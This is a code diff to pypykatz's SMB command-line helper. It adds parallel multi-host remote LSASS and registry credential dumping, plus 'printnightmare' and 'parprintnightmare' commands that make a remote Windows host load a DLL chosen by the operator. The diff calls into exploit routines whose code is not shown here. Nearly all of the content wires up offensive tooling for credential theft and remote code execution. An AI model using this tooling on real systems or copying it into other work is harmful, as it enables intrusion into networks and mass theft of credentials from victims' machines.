@@ -62,14 +62,15 @@ class SMBCMDHelper:
 
 		smb_lsassdump_group = smb_subparsers.add_parser('lsassdump', help='Remotely dumps and parses LSASS')
 		smb_lsassdump_group.add_argument('url', help="SMB connection string Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102'")
-		smb_lsassdump_group.add_argument('-m','--method', choices=['taskexec'] , default = 'taskexec', help = 'Print credentials in JSON format')
+		smb_lsassdump_group.add_argument('-m','--method', choices=['task', 'service'] , default = 'task', help = 'Print credentials in JSON format')
 		smb_lsassdump_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
 		smb_lsassdump_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
 		smb_lsassdump_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
 		smb_lsassdump_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
 		smb_lsassdump_group.add_argument('--chunksize', type=int, default=64*1024, help = 'Chunksize for file data retrival')
 		smb_lsassdump_group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap'], nargs="+", default = 'all', help = 'LSASS package to parse')
-
+		smb_lsassdump_group.add_argument('-t', '--target', nargs='*', help="Files/IPs/Hostnames for targets")
+		smb_lsassdump_group.add_argument('-w', '--worker-count', type=int, default = 10, help="Number of parallell enum workers. Always one worker/host")
 
 
 		smb_regfile_group = smb_subparsers.add_parser('regfile', help='Parse a remote registry hive dumps')
@@ -85,6 +86,9 @@ class SMBCMDHelper:
 		smb_regsec_group.add_argument('url', help="SMB connection string. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102'")
 		smb_regsec_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
 		smb_regsec_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
+		smb_regsec_group.add_argument('-t', '--target', nargs='*', help="Files/IPs/Hostnames for targets")
+		smb_regsec_group.add_argument('-w', '--worker-count', type=int, default = 10, help="Number of parallell enum workers. Always one worker/host")
+
 
 		smb_dcsync_group = smb_subparsers.add_parser('dcsync', help='DcSync')
 		smb_dcsync_group.add_argument('url', help="SMB connection string. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.2'")
@@ -121,6 +125,17 @@ class SMBCMDHelper:
 		smb_shareenum_parser.add_argument('--et', '--exclude-target', nargs='*', help = 'Exclude hosts from enumeration')
 		smb_shareenum_parser.add_argument('smb_url', help = 'SMB connection string. Credentials specified here will be used to perform the enumeration')
 
+		printnightmare_group = smb_subparsers.add_parser('printnightmare', help='printnightmare')
+		printnightmare_group.add_argument('url', help="SMB connection string. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/'")
+		printnightmare_group.add_argument('dllpath', help='Path to the DLL to be loaded by the remote host. Either UNC (\\\\<ip>\\path\\to\\dll.dll) or Full file path on the remote computer (C:\\path\\to\\dll.dll). Latter is useful if you have write permissions on the remote machine')
+		printnightmare_group.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'kerberos', help= 'Authentication method to use during login. If kerberos is used, the target must be DNS or hostname, NOT IP address!')
+		printnightmare_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
+		
+		parprintnightmare_group = smb_subparsers.add_parser('parprintnightmare', help='par printnightmare')
+		parprintnightmare_group.add_argument('url', help="SMB connection string. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/'")
+		parprintnightmare_group.add_argument('dllpath', help='Path to the DLL to be loaded by the remote host. Either UNC (\\\\<ip>\\path\\to\\dll.dll) or Full file path on the remote computer (C:\\path\\to\\dll.dll). Latter is useful if you have write permissions on the remote machine')
+		parprintnightmare_group.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'kerberos', help= 'Authentication method to use during login. If kerberos is used, the target must be DNS or hostname, NOT IP address!')
+		parprintnightmare_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
 
 
 
@@ -140,14 +155,15 @@ class SMBCMDHelper:
 		live_lsassdump_group.add_argument('host', help='Target host to connect to')
 		live_lsassdump_group.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'kerberos', help= 'Authentication method to use during login. If kerberos is used, the target must be DNS or hostname, NOT IP address!')
 		live_lsassdump_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
-		live_lsassdump_group.add_argument('-m','--method', choices=['taskexec'] , default = 'taskexec', help = 'Print credentials in JSON format')
+		live_lsassdump_group.add_argument('-m','--method', choices=['task', 'service'] , default = 'task', help = 'Print credentials in JSON format')
 		live_lsassdump_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
 		live_lsassdump_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
 		live_lsassdump_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
 		live_lsassdump_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
 		live_lsassdump_group.add_argument('--chunksize', type=int, default=64*1024, help = 'Chunksize for file data retrival')
 		live_lsassdump_group.add_argument('-p','--packages', choices = ['all','msv', 'wdigest', 'tspkg', 'ssp', 'livessp', 'dpapi', 'cloudap'], nargs="+", default = 'all', help = 'LSASS package to parse')
-
+		live_lsassdump_group.add_argument('-t', '--target', nargs='*', help="Files/IPs/Hostnames for targets")
+		live_lsassdump_group.add_argument('-w', '--worker-count', type=int, default = 10, help="Number of parallell enum workers. Always one worker/host")
 		
 		live_regsec_group = live_smb_subparsers.add_parser('regdump', help='Remotely dumps and parses registry')
 		live_regsec_group.add_argument('host', help='Target host to connect to')
@@ -155,6 +171,8 @@ class SMBCMDHelper:
 		live_regsec_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
 		live_regsec_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
 		live_regsec_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
+		live_regsec_group.add_argument('-w', '--worker-count', type=int, default = 10, help="Number of parallell enum workers. Always one worker/host")
+		live_regsec_group.add_argument('-t', '--target', nargs='*', help="Files/IPs/Hostnames for targets")
 
 		live_dcsync_group = live_smb_subparsers.add_parser('dcsync', help='DcSync')
 		live_dcsync_group.add_argument('host', help='Target host to connect to')
@@ -194,6 +212,17 @@ class SMBCMDHelper:
 		live_shareenum_parser.add_argument('--ed', '--exclude-dir', nargs='*', help = 'Exclude directories with name specified')
 		live_shareenum_parser.add_argument('--et', '--exclude-target', nargs='*', help = 'Exclude hosts from enumeration')
 
+		live_printnightmare_group = live_smb_subparsers.add_parser('printnightmare', help='printnightmare')
+		live_printnightmare_group.add_argument('host', help='Target host to connect to')
+		live_printnightmare_group.add_argument('dllpath', help='Path to the DLL to be loaded by the remote host. Either UNC (\\\\<ip>\\path\\to\\dll.dll) or Full file path on the remote computer (C:\\path\\to\\dll.dll). Latter is useful if you have write permissions on the remote machine')
+		live_printnightmare_group.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'kerberos', help= 'Authentication method to use during login. If kerberos is used, the target must be DNS or hostname, NOT IP address!')
+		live_printnightmare_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
+		
+		live_parprintnightmare_group = live_smb_subparsers.add_parser('parprintnightmare', help='par printnightmare')
+		live_parprintnightmare_group.add_argument('host', help='Target host to connect to')
+		live_parprintnightmare_group.add_argument('dllpath', help='Path to the DLL to be loaded by the remote host. Either UNC (\\\\<ip>\\path\\to\\dll.dll) or Full file path on the remote computer (C:\\path\\to\\dll.dll). Latter is useful if you have write permissions on the remote machine')
+		live_parprintnightmare_group.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'kerberos', help= 'Authentication method to use during login. If kerberos is used, the target must be DNS or hostname, NOT IP address!')
+		live_parprintnightmare_group.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
 
 		live_group = live_parser.add_parser('smb', help='SMB (live) commands', epilog=smb_live_epilog, parents=[live_subcommand_parser])
 		
@@ -249,8 +278,11 @@ class SMBCMDHelper:
 
 		elif args.livesmbcommand == 'lsassdump':
 			from pypykatz.smb.lsassutils import lsassdump
-			mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
-			self.process_results({'smbfile':mimi}, [], args)
+			tmimis = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages, method = args.method)
+			for tid, mimi, err in tmimis:
+				if err is not None:
+					print('ERROR: %s' % err)
+				self.process_results({'smbfile':mimi}, [], args)
 
 		elif args.livesmbcommand == 'secretsdump':
 			from pypykatz.smb.lsassutils import lsassdump
@@ -321,6 +353,22 @@ class SMBCMDHelper:
 						print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
 					else:
 						print(str(po))
+		
+		elif args.livesmbcommand == 'parprintnightmare':
+			from pypykatz.smb.printer import parprintnightmare
+			_, err = await parprintnightmare(smb_url, args.dllpath)
+			if err is not None:
+				print('Parprintnightmare failed! %s' % err)
+				return
+			print('Parprintnightmare OK!')
+
+		elif args.livesmbcommand == 'printnightmare':
+			from pypykatz.smb.printer import printnightmare
+			_, err = await printnightmare(smb_url, args.dllpath)
+			if err is not None:
+				print('Printnightmare failed! %s' % err)
+				return
+			print('Printnightmare OK!')
 
 		elif args.livesmbcommand == 'shareenum':
 			from pypykatz.smb.shareenum import shareenum
@@ -387,8 +435,17 @@ class SMBCMDHelper:
 
 		elif args.smb_module == 'lsassdump':
 			from pypykatz.smb.lsassutils import lsassdump
-			mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
-			self.process_results({'smbfile':mimi}, [], args)
+			async for tid, mimi, err in lsassdump(
+					args.url, 
+					chunksize=args.chunksize, 
+					packages=args.packages,
+					method = args.method,
+					targets = args.target, 
+					worker_cnt = args.worker_count
+				):
+				if err is not None:
+					continue
+				self.process_results({tid:mimi}, [], args)
 
 		elif args.smb_module == 'secretsdump':
 			from pypykatz.smb.lsassutils import lsassdump
@@ -449,16 +506,28 @@ class SMBCMDHelper:
 		
 		elif args.smb_module == 'regdump':
 			from pypykatz.smb.regutils import regdump
-			po = await regdump(args.url)
-
-			if po is not None:
-				if args.outfile:
-					po.to_file(args.outfile, args.json)
-				else:
-					if args.json:
-						print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
+			async for tid, po, err in regdump(args.url, targets=args.target, worker_cnt = args.worker_count):
+				if err is not None:
+					if args.outfile:
+						with open(args.outfile, 'a') as f:
+							f.write('[%s][ERROR]%s' % (tid, str(err)))
 					else:
-						print(str(po))
+						print('[%s][ERROR]%s' % (tid, str(err)))
+					
+					continue
+
+				if po is not None:
+					if args.outfile:
+						po.to_file(args.outfile, args.json)
+					else:
+						if args.json:
+							print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
+						else:
+							buffer = ''
+							for line in str(po).split('\n'):
+								buffer += '[%s] ' % tid 
+								buffer += line + '\r\n'
+							print(buffer)
 		
 		elif args.smb_module == 'regfile':
 			from pypykatz.smb.regutils import regfile
@@ -532,22 +601,38 @@ class SMBCMDHelper:
 						la.commands.append(command)
 
 			await amain(la)
+		
+		elif args.smb_module == 'printnightmare':
+			from pypykatz.smb.printer import printnightmare
+			_, err = await printnightmare(args.url, args.dllpath)
+			if err is not None:
+				print('Printnightmare failed! %s' % err)
+				return
+			print('Printnightmare OK!')
+		
+		elif args.smb_module == 'parprintnightmare':
+			from pypykatz.smb.printer import parprintnightmare
+			_, err = await parprintnightmare(args.url, args.dllpath)
+			if err is not None:
+				print('Parprintnightmare failed! %s' % err)
+				return
+			print('Parprintnightmare OK!')
 
 	def process_results(self, results, files_with_error, args, file_prefix = ''):
 		if args.outfile and args.json:
-			with open(args.outfile+file_prefix, 'w') as f:
+			with open(args.outfile+file_prefix, 'a') as f:
 				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)
 
 		elif args.outfile and args.grep:
-			with open(args.outfile+file_prefix, 'w', newline = '') as f:
-				f.write(':'.join(LogonSession.grep_header) + '\r\n')
+			with open(args.outfile+file_prefix, 'a', newline = '') as f:
+				f.write(':'.join(['target'] + LogonSession.grep_header) + '\r\n')
 				for result in results:
 					for luid in results[result].logon_sessions:
 						for row in results[result].logon_sessions[luid].to_grep_rows():
-							f.write(':'.join(row) + '\r\n')
+							f.write(':'.join([result] + row) + '\r\n')
 		
 		elif args.outfile:
-			with open(args.outfile+file_prefix, 'w') as f:
+			with open(args.outfile+file_prefix, 'a') as f:
 				for result in results:
 					f.write('FILE: ======== %s =======\n' % result)
 					
@@ -568,26 +653,26 @@ class SMBCMDHelper:
 			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
 		
 		elif args.grep:
-			print(':'.join(LogonSession.grep_header))
+			print(':'.join(['target'] + LogonSession.grep_header))
 			for result in results:
 				for luid in results[result].logon_sessions:
 					for row in results[result].logon_sessions[luid].to_grep_rows():
-						print(':'.join(row))
+						print(':'.join([result] + row))
 				for cred in results[result].orphaned_creds:
 					t = cred.to_dict()
 					if t['credtype'] != 'dpapi':
 						if t['password'] is not None:
-							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
+							x =  [result , str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
 							print(':'.join(x))
 					else:
 						t = cred.to_dict()
-						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
+						x = [result, str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
 						print(':'.join(x))
 				
 				for pkg, err in results[result].errors:
 					err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
 					err_str = base64.b64encode(err_str.encode()).decode()
-					x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str]
+					x =  [result + pkg+'_exception_please_report', '', '', '', '', '', '', '', '', err_str]
 					print(':'.join(x) + '\r\n')
 		else:
 			for result in results:
